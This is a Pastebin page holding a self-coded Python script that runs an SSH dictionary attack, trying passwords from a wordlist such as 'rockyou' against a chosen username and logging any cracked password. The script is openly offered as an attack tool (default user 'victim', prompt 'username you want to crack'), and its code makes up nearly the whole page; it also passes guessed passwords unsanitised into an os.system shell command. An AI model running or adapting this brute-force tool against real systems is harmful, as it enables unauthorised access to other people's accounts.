API tools faq
paste
Advertisement
metalni

[self_coded_script] dictionary_bruteforce.py

metalni
Oct 24th, 2021 (edited)
1,183
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.35 KB | None | 0 0
raw download clone embed print report
  1. # Script that starts a dictionary attack on a specific user via ssh, you need to have a dictionary, you can find a popular one by googling 'rockyou dictionary'
  2. # Start with python3 dictionary_bruteforce.py
  3.  
  4. import pty
  5. import os
  6. from os import waitpid, execv, read, write
  7.  
  8. class ssh():
  9.     def __init__(self, host, execute='echo "done" > ~/testing.txt',
  10.                  askpass=False, user='victim', password=b'passwords'):
  11.         self.exec_ = execute
  12.         self.host = host
  13.         self.user = user
  14.         self.password = password
  15.         self.askpass = askpass
  16.         self.run()
  17.  
  18.     def run(self):
  19.         command = [
  20.                 '/usr/bin/ssh',
  21.                 self.user+'@'+self.host,
  22.                 '-o', 'NumberOfPasswordPrompts=1',
  23.                 self.exec_,
  24.         ]
  25.  
  26.         pid, child_fd = pty.fork()
  27.  
  28.         if not pid:
  29.             execv(command[0], command)
  30.  
  31.         while self.askpass:
  32.             try:
  33.                 output = read(child_fd, 1024).strip()
  34.             except:
  35.                 break
  36.             lower = output.lower()
  37.             if b'password:' in lower:
  38.                 write(child_fd, self.password + b'\n')
  39.                 break
  40.             elif b'are you sure you want to continue connecting' in lower:
  41.                 write(child_fd, b'yes\n')
  42.             else:
  43.                 print('Error:', output)
  44.  
  45.         output = []
  46.         while True:
  47.             try:
  48.                 output.append(read(child_fd, 1024).strip())
  49.             except:
  50.                 break
  51.  
  52.         waitpid(pid, 0)
  53.         return b''.join(output)
  54.  
  55. if __name__ == "__main__":
  56.     user = input("Enter the username you want to crack: \n")
  57.     dictionary_path = input("Enter relative path to passwords dictionary: \n")
  58.     dictionary = open(dictionary_path, "r")
  59.  
  60.     output_file = '~/bruteforce_summary.txt'
  61.  
  62.     print("[*] Cracking Password For: " + user)
  63.  
  64.     is_found = False
  65.     for l in dictionary:
  66.         s = ssh("localhost", execute="ls ~/", askpass=True, user=user, password=l[0:len(l) - 1].encode())
  67.         if 'Permission denied' not in str(s.run()):
  68.             print("[+] Found Password: " + l[0:len(l) - 1] +"\n")
  69.             is_found = True
  70.             os.system('echo [+] Found Password: ' + l[0:len(l) - 1] + ' >> ' + output_file)
  71.             break
  72.  
  73.     if not is_found:
  74.         os.system('echo [-] Password Not Found >> ' + output_file)
  75.         print("[-] Password Not Found.\n")
  76.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!